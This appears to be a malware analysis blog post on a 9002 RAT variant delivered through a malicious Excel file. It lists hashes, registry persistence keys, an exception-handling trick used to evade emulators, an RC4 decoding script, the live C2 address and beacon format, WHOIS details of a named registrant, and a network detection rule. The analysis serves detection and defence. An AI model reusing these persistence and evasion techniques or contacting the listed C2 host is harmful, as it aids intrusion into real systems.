Another 9002 Trojan Variant

After investigating a newer malicious XLS document presumably targeted at a Chinese national, I noticed some oddly familiar network traffic produced by the backdoor it dropped. It was very clearly a variant of the 9002 RAT based on its command and control traffic. The 9002 RAT first achieved notoriety back in 2009 in relation to the Operation Aurora attacks but also more recently last year in FireEye’s blog posts about the Sunshop Campaign

However, the RAT itself is relatively uninteresting and beyond basic backdoor capabilities essentially serves as a platform to download and execute additional DLL’s. The part that first struck me this time was the persistence method; it used a standard Run key to call an export from the backdoor via rundll32.  This is fairly typical of a DLL backdoor, but the export that was called when disassembled appeared to be nothing more than an infinite loop, which called the Sleep function.  Somehow malicious routines in the backdoor would still start and it would begin beaconing so I decided to look a little deeper.

Technical Details

The document itself exploited the oldie but goodie, CVE-2012-0158 exploit.  The title of the document roughly translated “Two accounted for in the peace process table”.

 

Document Details:
MD5: 5E9EBB626F8483ABEB279F3CF90441ED
File Size: 333,824 Bytes

 

The document contained another encoded document within its body beginning at offset 0xBE00 as well as an encoded executable beginning at offset 0x10C00. Both were encoded using the same scheme of a single-byte XOR against the byte 0x9C and a right rotational byte shift (ROR) of 3.  The inner document is what would be shown to a potential victim upon successful exploitation and was saved as “%temp%\~tmp.xls”.  The outer document’s metadata was stripped from the file; however, the inner document retained the last save date of March 11, 2014 at 1:05AM PST.

 

The dropper was signed with a valid certificate belonging to “A’digm Inc.” and was written to “C:\RECYCLER\bmp{hex digit}.tmp”. Where “hex digit” is a randomly generated hexadecimal digit.

 

Dropper Details:
MD5: 33FC96A418AB7698DDBA97F240408B3B
File Size: 265,200 Bytes
Compile Time: 12/16/2013 03:08:29 UTC

 

Dropper Certificate Details:
Serial Number: 45 6E 96 7A 81 5A A5 CB B9 9F B8 6A CA 8F 7F 69
Thumb Print: 91 24 87 EC CF 3E 76 82 06 9E E4 F2 B8 2F 25 21 B0 BD 3B 1C
Validity: December 30, 2012 5:00 PM – January 30, 2015 4:59:59 PM
Subject:
CN: A’digm, Inc.
O: A’digm, Inc.
L: Gangnam-gu
S: Seoul
C: KR

 

Backdoor Details:
MD5: 863A5521633B735185850222363CF853
File Size: 144,968 Bytes
Compile Time: 12/09/2013 05:48:37 UTC

 

The dropper when executed will decode the backdoor from a resource section within its body named “RES” and write the decoded backdoor to the file “%CommonProgramFiles%\ODBC\Mshype.dll”. The backdoor was also signed with the same certificate belonging to “A’digm Inc.” on December 9, 2013, at 05:49:18 UTC.  The dropper created several registry keys including a Run key to establish persistence on the victim machine.

 

Registry Changes:

• HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KB923561 -> rundll32.exe “C:\Program Files\Common Files\ODBC\Mshype.dll”,Process32First

• HKCU\Software\Transpan\RunPath -> rundll32.exe “C:\Program Files\Common Files\ODBC\Mshype.dll”,Process32First

• HKCU\Software\TransPan\mshtm -> plain text configuration data (0x1F8 Bytes)

 

Persistence Mechanism:

• Run Key in the victim user’s registry hive:

• HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KB923561 which will call an export from the backdoor “Mshype.dll” via rundll32.exe

 

File System Changes:

• %temp%\~tmp.xls

• C:\RECYCLER\bmp{Hex Character(s)}.tmp

• %CommonProgramFiles%\ODBC\Mshype.dll

• %CommonProgramFiles%\ODBC\temp_k.ax (Stored Keystrokes)

• May Create %temp%\{hostname}_p.ax

• May Create %temp%\uid.ax

• May Create %CommonProgramFiles%\ODBC\temp_plugin.ax

• May Create %UserProfile%\AppData\Roaming\Microsoft\mscmos.ini (Vista+)

• May Create %UserProfile%\AppData\Roaming\Microsoft\temp_plugin.ax (Vista+)

• May Create %UserProfile%\AppData\Roaming\temp_k.ax (Vista+)

 

Volatile Evidence:

Creates the mutex “QPONMLKJIH”

Creates the mutex DirectInput.{89521361-AA8A-11CF-BFC7-444553540000}

Creates the mutex DirectInput.{5944E682-C92E-11CF-BFC7-444553540000}

 

What immediately struck me as odd about the backdoor was the persistence mechanism called the exported function, “Process32First”, which when disassembled does nothing more than sleep for five seconds in an infinite loop.  Somehow though the sample would still begin to beacon out.  I spent a few hours puzzling over this one before coming to the realization that when rundll32.exe uses the LoadLibraryW function to load “Mshype.dll” into its address space the DllMain function is called. 

The DllMain function in turn contains a subroutine, which calls CreateThread with the start address of 0x10001022. This thread in turn intentionally raises an uncontinuable exception using a standard API call to RaiseException; the exception handler then starts a new thread beginning at 0x1000105B, which contains the beginning of the decryption routines for the actual backdoor. My current guess is the use of structured exception handling is used to bypass some common emulation engines used in malware analysis; unsurprisingly this sample has a current detection rate of two.

The 9002 variant still used an intermediary stage of self-modifying shell code before getting to the actual unencrypted code. Although the standard encryption mechanism has been significantly altered to use RC4 with a key of “0123456789” as opposed to a single byte XOR.  The 1st stage is stored at file-offset 0xF040 and can be decoded using the python script below.

 

from Crypto.Cipher import ARC4
import sys

with open(sys.argv[1], 'rb') as bin:
         binary = bin.read()

try:
               key = '0123456789'
               rc4 = ARC4.new(key)
               decrypted = rc4.decrypt(binary)
               open(sys.argv[1]+'.dec','wb').write(decrypted)
except:
      pass

 Figure 1: Python Pseudocode to Decrypt 1st Stage Shellcode

The backdoor also included a DLL module inside of its body that would be loaded and run once decrypted.  This DLL was designed to log keystrokes and other activity to the file “%CommonProgramFiles%\ODBC\temp_k.ax” or “%UserProfile%\AppData\Roadming\temp_k.ax” depending on the operating system.  The keylogger itself was relatively uninteresting except for its use of DINPUT8.dll, a DirectX module more commonly responsible for providing joystick, mouse, keyboard, and other controller interfaces.  This DirectX 8 interface provides the key logger more granularity in determining exactly what activity occurred on the system.  Keystrokes were stored encoded in Unicode with a simple one byte XOR against the byte 0x56.

 

00000000   0D 56 01 56 1F 56 18 56  0B 56 5B 56 5C 56 2A 56   .V.V.V.V.V[V\V*V
00000010   2A 56 01 56 3F 56 38 56  32 56 39 56 21 56 25 56   *V.V?V8V2V9V!V%V
00000020   76 56 02 56 3F 56 22 56  3A 56 33 56 6C 56 76 56   vV.V?V"V:V3VlVvV
00000030   19 56 26 56 33 56 38 56  76 56 10 56 3F 56 3A 56   .V&V3V8VvV.V?V:V
00000040   33 56 25 56 76 56 2A 56  2A 56 64 56 66 56 67 56   3V%VvV*V*VdVfVgV
00000050   62 56 79 56 66 56 62 56  79 56 67 56 61 56 76 56   bVyVfVbVyVgVaVvV
00000060   67 56 62 56 6C 56 67 56  60 56 6C 56 65 56 63 56   gVbVlVgV`VlVeVcV
00000070   5B 56 5C 56 2A 56 2A 56  32 56 23 56 3B 56 26 56   [V\V*V*V2V#V;V&V
00000080   5B 56 5C 56 2A 56 2A 56  01 56 3F 56 38 56 32 56   [V\V*V*V.V?V8V2V
00000090   39 56 21 56 25 56 76 56  02 56 3F 56 22 56 3A 56   9V!V%VvV.V?V"V:V
000000A0   33 56 6C 56 76 56 01 56  3F 56 38 56 1E 56 33 56   3VlVvV.V?V8V.V3V
000000B0   2E 56 76 56 7B 56 76 56  0D 56 32 56 23 56 3B 56   .VvV{VvV.V2V#V;V
000000C0   26 56 33 56 32 56 78 56  32 56 3A 56 3A 56 0B 56   &V3V2VxV2V:V:V.V
000000D0   76 56 2A 56 2A 56 64 56  66 56 67 56 62 56 79 56   vV*V*VdVfVgVbVyV
000000E0   66 56 62 56 79 56 67 56  61 56 76 56 67 56 62 56   fVbVyVgVaVvVgVbV
000000F0   6C 56 67 56 60 56 6C 56  65 56 63 56 5B 56 5C 56   lVgV`VlVeVcV[V\V
00000100   2A 56 2A 56 6A 56 13 56  18 56 02 56 13 56 04 56   *V*VjV.V.V.V.V.V
00000110   68 56 5B 56 5C 56                                 hV[V\V

 Figure 2: Example Encoded Activity from “temp_k.ax”

00000000   5B 00 57 00 49 00 4E 00  5D 00 0D 00 0A 00 7C 00   [.W.I.N.].....|.
00000010   7C 00 57 00 69 00 6E 00  64 00 6F 00 77 00 73 00   |.W.i.n.d.o.w.s.
00000020   20 00 54 00 69 00 74 00  6C 00 65 00 3A 00 20 00    .T.i.t.l.e.:. .
00000030   4F 00 70 00 65 00 6E 00  20 00 46 00 69 00 6C 00   O.p.e.n. .F.i.l.
00000040   65 00 73 00 20 00 7C 00  7C 00 32 00 30 00 31 00   e.s. .|.|.2.0.1.
00000050   34 00 2F 00 30 00 34 00  2F 00 31 00 37 00 20 00   4./.0.4./.1.7. .
00000060   31 00 34 00 3A 00 31 00  36 00 3A 00 33 00 35 00   1.4.:.1.6.:.3.5.
00000070   0D 00 0A 00 7C 00 7C 00  64 00 75 00 6D 00 70 00   ....|.|.d.u.m.p.
00000080   0D 00 0A 00 7C 00 7C 00  57 00 69 00 6E 00 64 00   ....|.|.W.i.n.d.
00000090   6F 00 77 00 73 00 20 00  54 00 69 00 74 00 6C 00   o.w.s. .T.i.t.l.
000000A0   65 00 3A 00 20 00 57 00  69 00 6E 00 48 00 65 00   e.:. .W.i.n.H.e.
000000B0   78 00 20 00 2D 00 20 00  5B 00 64 00 75 00 6D 00   x. .-. .[.d.u.m.
000000C0   70 00 65 00 64 00 2E 00  64 00 6C 00 6C 00 5D 00   p.e.d...d.l.l.].
000000D0   20 00 7C 00 7C 00 32 00  30 00 31 00 34 00 2F 00    .|.|.2.0.1.4./.
000000E0   30 00 34 00 2F 00 31 00  37 00 20 00 31 00 34 00   0.4./.1.7. .1.4.
000000F0   3A 00 31 00 36 00 3A 00  33 00 35 00 0D 00 0A 00   :.1.6.:.3.5.....
00000100   7C 00 7C 00 3C 00 45 00  4E 00 54 00 45 00 52 00   |.|.<.E.N.T.E.R.
00000110   3E 00 0D 00 0A 00                                 >.....
Figure 3: Decoded Activity from “temp_k.ax”
 
 
Keylogger Details (In Memory Only):
MD5: 901C45A594B9FC9CB27723B7CE430235
File Size: 69,120 Bytes
Compile Time: 12/09/2013 05:41:33 UTC

 

This is probably the first in a number of future variants to come.  A copious number of debug statements were left in the code and can be viewed using something like SysInternals’ DebugView.

Network Traffic Details and Detection

After the second stage is decrypted in memory the backdoor will use the configuration data stored in plain text in “HKCU\Software\TransPan\mshtm” and beacon to “180.169.28.58” on port 1080.

 

00000000   30 30 30 30 30 30 30 30  00 00 00 00 00 00 00 00   00000000........
00000010   44 65 66 61 75 6C 74 00  00 00 00 00 00 00 00 00   Default.........
00000020   31 38 30 2E 31 36 39 2E  32 38 2E 35 38 00 00 00   180.169.28.58...
00000030   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000040   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000050   00 00 00 00 38 04 00 00  67 00 6F 00 6F 00 64 00   ....8...g.o.o.d.
00000060   6E 00 65 00 77 00 73 00  70 00 61 00 70 00 65 00   n.e.w.s.p.a.p.e.
00000070   72 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   r...............
00000080   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000090   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
000000A0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
000000B0   00 00 00 00 00 00 00 00  00 00 00 00 38 04 00 00   ............8...
000000C0   14 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
000000D0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
000000E0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
000000F0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000100   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000110   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000120   00 00 00 00 00 00 00 00  00 00 00 00 02 00 00 00   ................
00000130   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000140   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000150   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000160   00 00 00 00 38 04 00 00  00 00 00 00 00 00 00 00   ....8...........
00000170   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000180   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000190   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
000001A0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
000001B0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
000001C0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
000001D0  00 00 00 00 00 00 00 00 76 32 2E 38 00 00 00 00   ........v2.8....
000001E0   00 00 00 00 00 00 00 00  01 00 00 00 00 00 00 00   ................
000001F0   FF FF FF FF FF FF FF FF                           ÿÿÿÿÿÿÿÿ

 Figure 4: Configuration Data Stored in "mshtm" Registry Key

Two sample beacon packets are shown in the figures below:

00000000   33 31 30 32 0C 00 00 00  08 00 00 00 19 FF FF FF   3102.........ÿÿÿ
00000010   FF 00 00 00 00 11 00 00                           ÿ.......

 Figure 5: Sample Beacon Packet

The first beacon will always be preceded by the string “3102”.  The next 4 bytes are the encoded payload size and the following four bytes are the decoded payload size. The payload data will also still be compressed using the LZO compression library.  The second beacon utilizes a similar protocol wrapped in base64 and sent within HTTP POST requests.

 

POST /{Hex Number} HTTP/1.1
User-Agent: lynx
Host: 180.169.28.58:1080
Content-Length: 2
Connection: Keep-Alive
Cache-Control: no-cache

AA

 

It may also beacon using an HTTP CONNECT request; however, this behavior was not observed in testing.  The User-Agent used in communication makes these types of requests incredibly distinct and easy to detect as not many people even neckbeards use the command line browser lynx.  The backdoor itself once decrypted in memory also appears to contain an old configuration block or perhaps a backup configuration block with a version number of 1.0; however, no activity was observed going to the address in it.  The old configuration block pointed to “www.aestheticismwoods.com:443”; “www.aestheticismwoods.com” currently resolves to “202.55.5.177” and was first registered in May of 2010 using the email address “xutongshen_fj@hotmail.com”.

WHOIS Information for aestheticismwoods.com

Registrant Name: huangmeng
Registrant Organization: huang meng
Registrant Street: shanghai zhangheng
Registrant City: shanghai
Registrant State/Province: SH
Registrant Postal Code: 201204
Registrant Country: CN
Registrant Phone: +86.2161016550
Registrant Phone Ext: 0
Registrant Fax: +86.2161016551
Registrant Email: xutongshen_fj@hotmail.com 

It’s clear that simple changes in protocol headers are much easier to make than rewriting the network protocol itself. Despite FireEye’s suggestion of using the trailing 20 bytes to make a network signature for the initial beacon, the proposed ones in Emerging Threats still use the full 24 bytes. Similarly, for the second type of HTTP traffic the signature below exists:

 

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN Possible Trojan.APT.9002 POST"; flow:established,to_server; content:"POST "; depth:5; pcre:"/^POST\s+\/[a-f0-9]+\s/U"; content:!"|0d 0a|Referer|3a|"; distance:0; content:"User-Agent|3a 20|lynx|0d 0a|"; distance:0; reference:url,www.fireeye.com/blog/technical/cyber-exploits/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html; classtype:trojan-activity; sid:2017702; rev:2;)

  

It looks for an unnecessary number of additional headers and would not fire on this particular variant. I’d recommend just looking for POST requests with a User-Agent of “lynx”; if people are posting content to the Internet with lynx you probably want to look at it anyway (make sure to use the “tag” feature).  I’m sure more simple header changes are in the future since that seems to be all it takes to bypass current network-monitoring devices and the present state of the security mindset. In the same vein, attackers are continuing to move back towards more traditional and other custom small encryption algorithms as the industry slowly begins to detect more XOR’d content. Attackers wouldn’t use these kinds of simple tweaks if they didn’t continue to work so effectively.